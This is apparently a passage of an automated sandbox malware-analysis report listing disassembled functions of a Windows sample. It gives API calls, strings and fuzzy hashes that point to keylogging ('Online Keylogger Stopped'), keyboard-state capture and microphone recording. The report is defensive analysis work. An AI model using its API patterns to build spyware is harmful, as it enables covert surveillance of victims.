                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MetricsSystem
                                        • String ID:
                                        • API String ID: 4116985748-0
                                        • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                        • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                                        • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                        • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                                        Function 00441EED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                        Download Yara Rule
                                        APIs
                                        • __startOneArgErrorHandling.LIBCMT ref: 00441F7D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorHandling__start
                                        • String ID: pow
                                        • API String ID: 3213639722-2276729525
                                        • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                        • Instruction ID: b0758be5652a64c1ac5d647a76b92dde9bac1040a8da8be5e5c84d6172790ea5
                                        • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                        • Instruction Fuzzy Hash: E6515A61A0A20296F7117B14C98136F6B949B50741F288D6BF085823F9EF3DCCDB9A4E
                                        Function 00420F7E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID: 4[G$4[G
                                        • API String ID: 2931989736-4028565467
                                        • Opcode ID: 499d9a999da2a443c979618ec85ef4d06b5b2aab7498d5870cc08a11d2f7c627
                                        • Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
                                        • Opcode Fuzzy Hash: 499d9a999da2a443c979618ec85ef4d06b5b2aab7498d5870cc08a11d2f7c627
                                        • Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD
                                        Function 0044DB44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Info
                                        • String ID: $vD
                                        • API String ID: 1807457897-3636070802
                                        • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                        • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
                                        • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                        • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                                        Function 00417BEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                        Download Yara Rule
                                        APIs
                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C18
                                          • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C2B,00000000,?,?,?,?,00000000), ref: 004177B6
                                        • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C65
                                          • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C81,00000000,?,?), ref: 00417827
                                          • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CDC), ref: 004177CE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                        • String ID: image/jpeg
                                        • API String ID: 1291196975-3785015651
                                        • Opcode ID: d4376d3aa41ba41f336d454eb71a79e6a36b8bd1c58ceebdc91cf2e64db4f38d
                                        • Instruction ID: 3c33996df4896106dd3ee16a81609d02114e1f450a3ece369daacccd15328daf
                                        • Opcode Fuzzy Hash: d4376d3aa41ba41f336d454eb71a79e6a36b8bd1c58ceebdc91cf2e64db4f38d
                                        • Instruction Fuzzy Hash: 72315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                        Function 004508EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ACP$OCP
                                        • API String ID: 0-711371036
                                        • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                        • Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
                                        • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                        • Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
                                        Function 00417CE9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417D04
                                          • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C2B,00000000,?,?,?,?,00000000), ref: 004177B6
                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D29
                                          • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C81,00000000,?,?), ref: 00417827
                                          • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CDC), ref: 004177CE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                        • String ID: image/png
                                        • API String ID: 1291196975-2966254431
                                        • Opcode ID: 157e3c84acb298c00b8a811f8dbb714bd95cc3abe4333fe7ddc149ff661122fd
                                        • Instruction ID: 1f40aeda14031b83fd9eea2ddee5e82f5a36372f8d90ac1696f7ac499827f772
                                        • Opcode Fuzzy Hash: 157e3c84acb298c00b8a811f8dbb714bd95cc3abe4333fe7ddc149ff661122fd
                                        • Instruction Fuzzy Hash: 4621A135204211AFC300AF61CC88CAFBBBDEFCA755F10052EF90693151DB399945CBA6
                                        Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                        Strings
                                        • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: KeepAlive | Enabled | Timeout:
                                        • API String ID: 481472006-1507639952
                                        • Opcode ID: 9629856601c2ade6b9171a8da2872b59cbc4edb5dc9735de265d34bbd197e3ce
                                        • Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
                                        • Opcode Fuzzy Hash: 9629856601c2ade6b9171a8da2872b59cbc4edb5dc9735de265d34bbd197e3ce
                                        • Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F
                                        Function 004336FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: LG$XG
                                        • API String ID: 0-1482930923
                                        • Opcode ID: c15126115d7b74b818ce8cc4bfc83f894c4a74ec01747284a75d25f55942686d
                                        • Instruction ID: 7c4b062fcb32332b9137c766d59a1203f687c3695f5e31fbe0a477c862ff6f2a
                                        • Opcode Fuzzy Hash: c15126115d7b74b818ce8cc4bfc83f894c4a74ec01747284a75d25f55942686d
                                        • Instruction Fuzzy Hash: 07110AB5D01714AACF20DFA998017CFB7A55F05725F14D16BEC18EB281D378EB408798
                                        Function 0041A696 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: | $%02i:%02i:%02i:%03i
                                        • API String ID: 481472006-2430845779
                                        • Opcode ID: 7c541b1fe11d74047bf4de15ff6413637149af1765b06644cf8be9994c192f8f
                                        • Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
                                        • Opcode Fuzzy Hash: 7c541b1fe11d74047bf4de15ff6413637149af1765b06644cf8be9994c192f8f
                                        • Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E
                                        Function 004125EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412612
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412648
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: QueryValue
                                        • String ID: TUF
                                        • API String ID: 3660427363-3431404234
                                        • Opcode ID: ea05bdfc88d730103140c1813835b768b0c4990d0bb52d9cb4e5ffcfc942b32d
                                        • Instruction ID: c735b93b908d9d71aa6a4d05a3740b5a2597980304af3aa5722c76a25f50973a
                                        • Opcode Fuzzy Hash: ea05bdfc88d730103140c1813835b768b0c4990d0bb52d9cb4e5ffcfc942b32d
                                        • Instruction Fuzzy Hash: B201A2B6A00108BFEB04EB95DD46EFFBABDEF44240F10007AF901E2251E6B4AF009664
                                        Function 00419E99 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 00419EBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: TUF$alarm.wav
                                        • API String ID: 1174141254-147985980
                                        • Opcode ID: bb35db19ecf725e66f50cc2985e16286bdf7f8f1df2ddcf995444714096ddcfa
                                        • Instruction ID: dd13df65ec224498850e23f6f848d4e774319f78d5db457f3497a795ed38963e
                                        • Opcode Fuzzy Hash: bb35db19ecf725e66f50cc2985e16286bdf7f8f1df2ddcf995444714096ddcfa
                                        • Instruction Fuzzy Hash: F301927060420166C604B676D866AEE77418BC1719F50413FF88A966E2EF7C9EC6C2CF
                                        Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                        • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                        • String ID: Online Keylogger Stopped
                                        • API String ID: 1623830855-1496645233
                                        • Opcode ID: aa2cc70d391a599e14960110e5ba635763145c369873a0ecd25f92c1668795cb
                                        • Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
                                        • Opcode Fuzzy Hash: aa2cc70d391a599e14960110e5ba635763145c369873a0ecd25f92c1668795cb
                                        • Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB
                                        Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • waveInPrepareHeader.WINMM(007CF5C0,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                                        • waveInAddBuffer.WINMM(007CF5C0,00000020,?,00000000,00401913), ref: 0040175D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wave$BufferHeaderPrepare
                                        • String ID: T=G
                                        • API String ID: 2315374483-379896819
                                        • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                        • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                        • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                        • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                        Function 004477A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocaleValid
                                        • String ID: IsValidLocaleName$z=D
                                        • API String ID: 1901932003-2791046955
                                        • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                        • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                                        • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                        • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                                        Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: T=G$T=G
                                        • API String ID: 3519838083-3732185208
                                        • Opcode ID: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                        • Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
                                        • Opcode Fuzzy Hash: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                        • Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
                                        Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyState.USER32(00000011), ref: 0040AD5B
                                          • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                          • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                          • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                          • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                          • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                          • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                          • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
